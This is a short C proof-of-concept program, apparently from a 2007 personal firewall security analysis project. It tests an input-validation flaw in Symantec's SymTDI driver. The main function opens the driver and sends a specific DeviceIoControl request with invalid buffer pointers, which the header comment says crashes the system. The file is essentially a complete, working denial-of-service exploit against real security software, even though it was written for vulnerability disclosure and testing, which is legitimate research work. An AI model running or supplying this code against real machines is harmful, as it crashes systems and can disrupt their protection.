/*

 Testing program for Insufficient validation of "SymTDI" driver input buffer (BTP00012P002NF)

 Usage:
 prog
   (the program is executed without special arguments)

 Description:
 This program uses standard Windows API CreateFile to open "SymTDI" driver and using DeviceIoControl it sends 
 a malicious buffer to the driver that crashs the system.

 Test:
 Running the testing program.

*/

#include <stdio.h>
#include <windows.h>

void about(void)
{
  printf("Testing program for Insufficient validation of \"SymTDI\" driver input buffer (BTP00012P002NF)\n");
  printf("Windows Personal Firewall analysis project\n");
  printf("Copyright 2007 by Matousec - Transparent security\n");
  printf("http://www.matousec.com/""\n\n");
  return;
}

void usage(void)
{
  printf("Usage: test\n"
         "  (the program is executed without special arguments)\n");
  return;
}


/*
 formats and prints the error message for system last error on the standard error output
*/

void print_last_error(void)
{
  LPTSTR buf;
  DWORD code=GetLastError();
  if (FormatMessage(FORMAT_MESSAGE_ALLOCATE_BUFFER | FORMAT_MESSAGE_FROM_SYSTEM,NULL,code,0,(LPTSTR)&buf,0,NULL))
  {
    fprintf(stderr,"Error code: %ld\n",code);
    fprintf(stderr,"Error message: %s",buf);
    LocalFree(buf);
  } else fprintf(stderr,"Unable to format error message for code %ld.\n",code);
  return;
}


int main(int argc,char **argv)
{
  about();

  if (argc!=1)
  {
    usage();
    return 1;
  }

  HANDLE file=CreateFile("\\\\.\\Global\\SymTDI",GENERIC_READ | GENERIC_WRITE,FILE_SHARE_READ | FILE_SHARE_WRITE,
                         NULL,OPEN_EXISTING,0,NULL);
  if (file!=INVALID_HANDLE_VALUE)
  {
    DWORD retlen;
    DeviceIoControl(file,0x83022003,(PVOID)1,256,(PVOID)1,256,&retlen,NULL);
  } else
  {
    fprintf(stderr,"Unable to open SymTDI device.\n");
    print_last_error();
    fprintf(stderr,"\n");
  }
  

  printf("\nTEST FAILED!\n");
  return 1;
}
